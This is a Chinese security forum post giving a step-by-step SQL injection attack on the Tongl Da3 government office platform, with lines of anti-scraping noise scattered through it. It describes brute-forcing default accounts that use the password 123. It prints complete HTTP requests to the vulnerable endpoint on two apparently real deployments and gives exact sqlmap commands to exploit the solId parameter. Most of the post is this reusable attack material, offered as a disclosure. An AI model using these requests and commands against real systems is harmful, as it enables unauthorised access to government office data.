找回密码
 立即注册
查看: 1980|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! Q; F+ s5 S. o2 W
1 z! D7 g, A" O' B

" \" T: } e: B1 t" g& `2 Y

) ~1 T+ L _9 f1 D; `; m2 f3 E 平台简介:) d- k$ s1 R( U" J( h

9 i3 O7 V+ @2 D! ]" r

( a+ Y# j$ ]/ z; A! j  + ^. ?2 E: M+ \1 _. Z n1 ^( k/ `

0 }' G$ S, m* R6 F; b$ P1 F

+ E( u4 P! l, i- x% H R 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& a0 u; X4 E* V/ E1 W同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ X0 M6 [7 l3 p 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!/ l3 X d% {3 c! N6 S6 S

1 |6 g3 e3 o; U. _0 y5 _

! E; O/ G: [7 [4 G8 ^! K  ; M6 y; ` `, Y- b; V7 `

; f. ` C y2 c' m

" n1 U9 ]* t2 U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* J V# y: h, L1 ^8 T

" {! K5 n+ N# p/ q h2 Q) e

2 z- ~' [1 P( A! s6 U. i" U' m   ) N1 H% b1 P+ F% Q( B5 C ^. q' `

0 S% Z% L. \4 P S4 p3 f

( |, ?" ` Q' R' {$ t- ^ b2 U http://1.1.1.1:7197/cap-aco/#(案例2-) 3 M, V1 H- E: E' ?% |8 P& L

* z- O9 G% K1 V {! a B

. r6 i. x6 d- s) ]5 ? http://www.XXOO.com (案例1-官网网站) / n$ |- i* l3 [

8 y$ c5 s( t% x+ b: W* T: L

0 f a. f5 j; T; G: q/ v# }   a* u' ?% @6 c& @; p+ x6 C

5 O# v3 E* z( D, w9 F) y

2 z0 W5 G2 m& L1 ]3 v: f 漏洞详情: $ K% J, ~ f2 R, s/ E- f! C

0 f: y( Y* v/ J1 Z, S, B2 M

( T- F9 _+ {8 Q' B W  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 D0 c$ n% p3 s X0 }

f# b7 m, V/ d8 [! P

% J! H* @( {5 h' P: p& x      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: " O# [5 d6 S1 U% q

" q( M$ e" r, \7 t6 i

1 d0 q; e5 ?4 D# ^5 ^2 f* \  : K# x# f: C8 y) @

$ i) d, d$ N# O# k

) m, Z2 O% C% s( R4 C4 K  $ l( g: Y$ I1 l- q

7 s. V- ]5 v1 V% ^; ~4 p5 P0 b

7 Q' y& n2 P- u( U! J3 j status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: + q6 K: p9 a& K) U. @

( Y* V( h- N u4 r T

4 E# `! |% C: o4 i4 n, ^ 1、案例1-官方网站# \% Q1 ?& a. G+ Q

, m2 j0 F* x8 u; W' P4 E

' e0 {: T& j( W. V) ]8 {, N GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 1 x2 n" c7 j/ l% F) _

' s& H/ ?2 S+ l4 h: |9 E

4 Y, z# P2 c. V9 F Host: www.XXOO.com * ^/ \( w, G, ?, e8 I( _: o) M5 l

' ^& @2 q( c P7 l9 e U- N

* A D: T! h! u/ I2 b Proxy-Connection: Keep-Alive " G7 `' j, i; d! Y2 L

" A0 U: F2 p; H$ E: A& T

, c# t8 M& |+ ] Accept: application/json, text/javascript, */*; q=0.01 ) k8 W. e$ W0 f: `9 m; u: {

9 ?' _9 T4 K/ u% M9 G! c2 g

+ @- P. F# i3 E6 D. {/ w% F4 j Accept-Language: zh-CN u6 x7 x, ?" E ^

; C1 P' k+ T% _* S+ I. L; t9 B

" K2 ^6 o! T1 m Content-Type: application/json . J8 [$ Q- ?) X0 I

7 m8 o% q" d. s" Q+ s, u5 l

, M$ E& H# J4 g( E5 T' m* M+ i- p User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko ' ^5 u9 S3 A/ |) [8 s

& [, `, E2 s8 ~4 G0 z8 n: d

6 h- `, z9 S6 r* N X-Requested-With: XMLHttpRequest : I6 ~2 h+ e1 K8 b8 }

7 o' m& Z( v5 N0 A

. d4 [/ o/ v0 u& A* g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 ( ^! C& a# i! w# F9 S

" i5 O; @( h4 M, _0 ]2 s1 _, D4 C

5 ? [0 W) u" l Accept-Encoding: gzip, deflate, sdch 8 w/ b& ?2 D; F+ Q. k+ k5 c7 G

9 [7 _6 J( U, Z2 t- y

* T6 x) p- B6 B8 ~7 z* f4 m# K Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e1 _" ^5 h- D) n9 V

3 s, T5 R1 O( ?9 `0 Q

6 X# H- v M0 p4 u* D" }$ s Z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ u+ a% K5 n9 h5 @) x; M! h

X* R$ d2 l3 S

& ?; L- z) c8 a  0 ^5 p& k1 V- h

$ H- @; d8 L( f: }

8 W, T& k, E8 i: f$ z  * X p( y& @" C$ @1 d5 M3 e

) ~8 r0 r+ v; D- A% k" N

7 h3 j& d0 W' c- W4 r, p+ i( E* T   3 }5 o! W" W0 w/ ]! |

* u2 U, M. N+ F

# h4 w+ b6 H* @; l5 o; A! V' I* [5 z   2 _! p& L0 U2 d4 ^; ^4 O4 v7 o; X

# x! E' N" {2 w8 D$ R$ U* G

7 T: Z2 U: h: a0 X   7 L. E6 V- N) D/ C

/ h# L2 I! y* O/ `

( G8 R& @& }) F( M4 n 2、案例2-某天河云平台 ) s7 K. k/ u. p4 j$ A

. Q' c; G+ d6 O- g. v4 _

- D3 o2 t w/ ~9 K8 P8 ~2 T* I8 F GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.16 q) a, z1 D5 Q& |# l$ R# m! R

8 f# y! W: ^* T+ M. Q7 j

) J6 K% ]' T, e# G$ H; G o" T; B Host: 1.1.1.:7197 1 N1 H+ m1 M* @1 @$ A

, ^; H' K ?6 {

% K$ q' n- r6 y, q Accept: application/json, text/javascript, */*; q=0.01 : d; s3 C- p9 i3 B

% P/ g. `8 ?7 h

* V' }$ }1 _8 a+ X* Q X-Requested-With: XMLHttpRequest' Q8 F0 R+ Q6 P7 y7 v

: l q" G* ^1 ~. p* [/ C

. V0 ^9 a) }7 E5 N3 C User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 1 q4 W2 [8 y8 d3 c1 O1 @8 y

# l% t8 f/ p, I: A! H. I

" E5 u w; R, |) }" k# B Content-Type: application/json' _7 T" t( f% v+ Z; R

9 e8 Q7 z5 I/ Q Y9 v

8 o) D# j8 W- r x w% [ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 7 p" Q/ t5 [; b6 n1 X

# f3 a4 l2 b' [: z/ Z2 y( Q9 b

% X# y, i6 E8 Q8 x) C) \7 i6 r6 q Accept-Language: zh-CN,zh;q=0.8 " n$ t3 g6 l# V4 o% N

( G. T6 Q6 U9 E. N

: ~, j6 J. n, f4 a Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=17 N s; N% p6 T$ d7 t3 @; P( d

" ?! d8 l, i [; t# K

+ x7 K! Q% }9 T C7 H; z) E Connection: close+ y0 b) q9 {9 [8 K; J

9 n* z0 u a4 Z1 {

& N$ I; d) N- v* Z" K; R b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 4 N e: v! T' c

- A3 b3 ?+ H& K0 Z/ j5 L

& x. C) K R. h/ U, i o   2 ~7 ~- j, ]# W& M+ K. T2 C9 A& [

% e7 E2 w% k, x8 y' x% G) Z

`4 t. H( M; F- Y6 o
0 T4 e" A1 p$ D7 n. m* ?/ A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表